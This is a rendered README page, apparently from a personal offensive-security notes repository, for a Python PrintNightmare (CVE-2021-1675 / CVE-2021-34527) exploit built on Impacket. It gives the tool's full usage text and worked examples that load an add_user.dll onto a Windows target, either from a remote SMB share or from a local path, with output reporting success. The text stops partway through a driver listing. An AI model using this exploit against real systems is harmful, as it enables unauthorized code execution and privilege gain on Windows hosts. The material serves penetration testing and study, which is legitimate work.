stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/windows/print_nightmare/PrintNightmare/README.html

433 lines
68 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
init
2022-09-02 09:05:59 +02:00
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
Added settings.toml
2022-09-09 15:41:05 +02:00
<title>The Real Hugo</title>
init
2022-09-02 09:05:59 +02:00
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
Added settings.toml
2022-09-09 15:41:05 +02:00
<a href="/" style="text-decoration:none">Husk</a>
init
2022-09-02 09:05:59 +02:00
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
init
2022-09-02 09:05:59 +02:00
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#printnightmare">PrintNightmare</a><ul>
<li><a href="#installtion">Installtion</a></li>
<li><a href="#usage">Usage</a><ul>
<li><a href="#examples">Examples</a><ul>
<li><a href="#exploitation">Exploitation</a><ul>
<li><a href="#remote-dll">Remote DLL</a></li>
<li><a href="#local-dll">Local DLL</a></li>
<li><a href="#custom-name">Custom name</a></li>
</ul>
</li>
<li><a href="#check-if-target-is-vulnerable">Check if target is vulnerable</a><ul>
<li><a href="#unpatched-windows-10">Unpatched Windows 10</a></li>
<li><a href="#patched-windows-server-2022">Patched Windows Server 2022</a></li>
</ul>
</li>
<li><a href="#list-current-printer-drivers">List current printer drivers</a></li>
<li><a href="#delete-printer-driver">Delete printer driver</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#details">Details</a><ul>
<li><a href="#cve-2021-1675">CVE-2021-1675</a></li>
<li><a href="#cve-2021-34527">CVE-2021-34527</a></li>
<li><a href="#combining-the-pieces">Combining the pieces</a><ul>
<li><a href="#smb-and-unc">SMB and UNC</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#authors">Authors</a></li>
<li><a href="#credits">Credits</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="printnightmare">PrintNightmare</h1>
<p>Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.</p>
<h2 id="installtion">Installtion</h2>
<div class="codehilite"><pre><span></span><code>$ pip3 install impacket
</code></pre></div>
<h2 id="usage">Usage</h2>
<div class="codehilite"><pre><span></span><code><span class="n">Impacket</span><span class="w"> </span><span class="n">v0</span><span class="mf">.9.23</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">Copyright</span><span class="w"> </span><span class="mi">2021</span><span class="w"> </span><span class="n">SecureAuth</span><span class="w"> </span><span class="n">Corporation</span><span class="w"></span>
<span class="nl">usage</span><span class="p">:</span><span class="w"> </span><span class="n">printnightmare</span><span class="p">.</span><span class="n">py</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">h</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">debug</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">port</span><span class="w"> </span><span class="p">[</span><span class="n">destination</span><span class="w"> </span><span class="n">port</span><span class="p">]]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">target</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">hashes</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">no</span><span class="o">-</span><span class="n">pass</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">k</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">name</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">env</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">path</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">path</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">dll</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">dll</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">check</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">list</span><span class="p">]</span><span class="w"> </span><span class="p">[</span><span class="o">-</span><span class="n">delete</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="n">target</span><span class="w"></span>
<span class="n">PrintNightmare</span><span class="w"> </span><span class="p">(</span><span class="n">CVE</span><span class="mi">-2021-1675</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="n">CVE</span><span class="mi">-2021-34527</span><span class="p">)</span><span class="w"></span>
<span class="n">positional</span><span class="w"> </span><span class="n">arguments</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="p">[[</span><span class="n">domain</span><span class="o">/</span><span class="p">]</span><span class="n">username</span><span class="p">[</span><span class="o">:</span><span class="n">password</span><span class="p">]@]</span><span class="o">&lt;</span><span class="n">targetName</span><span class="w"> </span><span class="n">or</span><span class="w"> </span><span class="n">address</span><span class="o">&gt;</span><span class="w"></span>
<span class="n">optional</span><span class="w"> </span><span class="n">arguments</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">h</span><span class="p">,</span><span class="w"> </span><span class="o">--</span><span class="n">help</span><span class="w"> </span><span class="n">show</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="n">help</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">exit</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">debug</span><span class="w"> </span><span class="n">Turn</span><span class="w"> </span><span class="n">DEBUG</span><span class="w"> </span><span class="n">output</span><span class="w"> </span><span class="n">ON</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">no</span><span class="o">-</span><span class="n">pass</span><span class="w"> </span><span class="n">don</span><span class="err">&#39;</span><span class="n">t</span><span class="w"> </span><span class="n">ask</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="p">(</span><span class="n">useful</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">-</span><span class="n">k</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">k</span><span class="w"> </span><span class="n">Use</span><span class="w"> </span><span class="n">Kerberos</span><span class="w"> </span><span class="n">authentication</span><span class="p">.</span><span class="w"> </span><span class="n">Grabs</span><span class="w"> </span><span class="n">credentials</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="n">ccache</span><span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="p">(</span><span class="n">KRB5CCNAME</span><span class="p">)</span><span class="w"> </span><span class="n">based</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">parameters</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">valid</span><span class="w"> </span><span class="n">credentials</span><span class="w"></span>
<span class="w"> </span><span class="n">cannot</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">found</span><span class="p">,</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">ones</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">command</span><span class="w"> </span><span class="n">line</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="w"> </span><span class="n">IP</span><span class="w"> </span><span class="n">Address</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">domain</span><span class="w"> </span><span class="n">controller</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">omitted</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">domain</span><span class="w"> </span><span class="n">part</span><span class="w"> </span><span class="p">(</span><span class="n">FQDN</span><span class="p">)</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">parameter</span><span class="w"></span>
<span class="nl">connection</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">port</span><span class="w"> </span><span class="p">[</span><span class="n">destination</span><span class="w"> </span><span class="n">port</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Destination</span><span class="w"> </span><span class="n">port</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">connect</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">MS</span><span class="o">-</span><span class="n">RPRN</span><span class="w"> </span><span class="n">named</span><span class="w"> </span><span class="n">pipe</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">target</span><span class="o">-</span><span class="n">ip</span><span class="w"> </span><span class="n">ip</span><span class="w"> </span><span class="n">address</span><span class="w"></span>
<span class="w"> </span><span class="n">IP</span><span class="w"> </span><span class="n">Address</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">machine</span><span class="p">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">ommited</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">whatever</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">specified</span><span class="w"> </span><span class="n">as</span><span class="w"> </span><span class="n">target</span><span class="p">.</span><span class="w"> </span><span class="n">This</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">useful</span><span class="w"> </span><span class="n">when</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">the</span><span class="w"></span>
<span class="w"> </span><span class="n">NetBIOS</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">cannot</span><span class="w"> </span><span class="n">resolve</span><span class="w"> </span><span class="n">it</span><span class="w"></span>
<span class="nl">authentication</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">hashes</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="w"></span>
<span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="n">hashes</span><span class="p">,</span><span class="w"> </span><span class="n">format</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">LMHASH</span><span class="o">:</span><span class="n">NTHASH</span><span class="w"></span>
<span class="nl">driver</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">name</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">Name</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">env</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">Environment</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">path</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">path</span><span class="w"> </span><span class="n">Driver</span><span class="w"> </span><span class="n">path</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">dll</span><span class="w"> </span><span class="n">driver</span><span class="w"> </span><span class="n">dll</span><span class="w"> </span><span class="n">Path</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">DLL</span><span class="w"></span>
<span class="nl">modes</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">check</span><span class="w"> </span><span class="n">Check</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">target</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="n">vulnerable</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">list</span><span class="w"> </span><span class="n">List</span><span class="w"> </span><span class="n">existing</span><span class="w"> </span><span class="n">printer</span><span class="w"> </span><span class="n">drivers</span><span class="w"></span>
<span class="w"> </span><span class="o">-</span><span class="n">delete</span><span class="w"> </span><span class="n">Deletes</span><span class="w"> </span><span class="n">printer</span><span class="w"> </span><span class="n">driver</span><span class="w"></span>
</code></pre></div>
<h3 id="examples">Examples</h3>
<h4 id="exploitation">Exploitation</h4>
<h5 id="remote-dll">Remote DLL</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;\\172.16.19.1\smb\add_user.dll&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;\\\\172.16.19.1\\smb\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Copying over DLL
<span class="o">[</span>*<span class="o">]</span> Successfully copied over DLL
<span class="o">[</span>*<span class="o">]</span> Trying to load DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
</code></pre></div>
<h5 id="local-dll">Local DLL</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Loading DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
</code></pre></div>
<p>Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.</p>
<h5 id="custom-name">Custom name</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -dll <span class="s1">&#39;\\172.16.19.1\smb\add_user.dll&#39;</span> -name <span class="s1">&#39;My Printer Driver&#39;</span> <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
<span class="o">[</span>*<span class="o">]</span> Driver name: <span class="s1">&#39;My Printer Driver&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Driver path: <span class="s1">&#39;C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL&#39;</span>
<span class="o">[</span>*<span class="o">]</span> DLL path: <span class="s1">&#39;\\\\172.16.19.1\\smb\\add_user.dll&#39;</span>
<span class="o">[</span>*<span class="o">]</span> Copying over DLL
<span class="o">[</span>*<span class="o">]</span> Successfully copied over DLL
<span class="o">[</span>*<span class="o">]</span> Trying to load DLL
<span class="o">[</span>*<span class="o">]</span> Successfully loaded DLL
$ ./printnightmare.py -list <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
Name: Microsoft XPS Document Writer v4
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_18b0d38ddfaee729<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms001.inf_amd64_f340cb58fcd23202<span class="se">\M</span>XDW.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_9bf7e0c26ba91f8b<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft Print To PDF
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_18b0d38ddfaee729<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms009.inf_amd64_80184dcbef6775bc<span class="se">\M</span>PDW-PDC.xml
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_9bf7e0c26ba91f8b<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: My Printer Driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\U</span>NIDRV.DLL
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\a</span>dd_user.dll
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\a</span>dd_user.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
Name: Microsoft Shared Fax Driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSDRV.DLL
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSUI.DLL
